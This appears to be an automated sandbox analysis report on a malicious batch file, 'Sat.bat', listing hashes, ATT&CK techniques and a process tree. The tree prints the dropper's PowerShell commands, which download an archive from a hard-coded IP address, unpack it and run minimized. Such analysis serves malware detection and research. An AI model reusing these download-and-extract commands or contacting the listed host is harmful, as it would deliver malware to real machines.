64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

General

Target

Sat.bat
Size

2KB
MD5

0e2fff554ddadc58aaff7978ec06aa32
SHA1

b453b17905235ea96150c90711285f7879d3afc0
SHA256

64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
SHA512

c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://109.199.101.109:770/xx.jpg

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1768 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2772 powershell.exe
3008 powershell.exe
1768 powershell.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2524 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

3008 powershell.exe
3008 powershell.exe
3008 powershell.exe
1768 powershell.exe
2772 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3008 powershell.exe
Token: SeDebugPrivilege 1768 powershell.exe
Token: SeDebugPrivilege 2772 powershell.exe

flow	pid	process
4	1768	powershell.exe

pid	process
2772	powershell.exe
3008	powershell.exe
1768	powershell.exe

pid	process
2524	timeout.exe

pid	process
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
1768	powershell.exe
2772	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.execmd.exe

description	pid	process	target process
PID 2860 wrote to memory of 3008	2860	cmd.exe	powershell.exe
PID 2860 wrote to memory of 3008	2860	cmd.exe	powershell.exe
PID 2860 wrote to memory of 3008	2860	cmd.exe	powershell.exe
PID 3008 wrote to memory of 264	3008	powershell.exe	cmd.exe
PID 3008 wrote to memory of 264	3008	powershell.exe	cmd.exe
PID 3008 wrote to memory of 264	3008	powershell.exe	cmd.exe
PID 264 wrote to memory of 1768	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 1768	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 1768	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 2772	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 2772	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 2772	264	cmd.exe	powershell.exe
PID 264 wrote to memory of 2524	264	cmd.exe	timeout.exe
PID 264 wrote to memory of 2524	264	cmd.exe	timeout.exe
PID 264 wrote to memory of 2524	264	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2772
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
300d02a1c8604dcf4cb73693170d662d

SHA1
b1983fd57d9f0d4fe52665a97d81b595be746d9d

SHA256
11a6f3e6846e9d4947cc89feb0747dac50137a2b7173978abe386d06fd97df32

SHA512
2bb7bd1e421700e0181b595da5c83903d912ac8c40071105f4ce4c47c153685c95e2a654c6559273926f5c2992f209c277ba08a296bdab23045a2ee7b2c096b0

Download Submit
memory/2772-23-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2772-24-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/3008-4-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

Filesize
4KB

Download
memory/3008-5-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/3008-7-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/3008-8-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-9-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-10-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-11-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing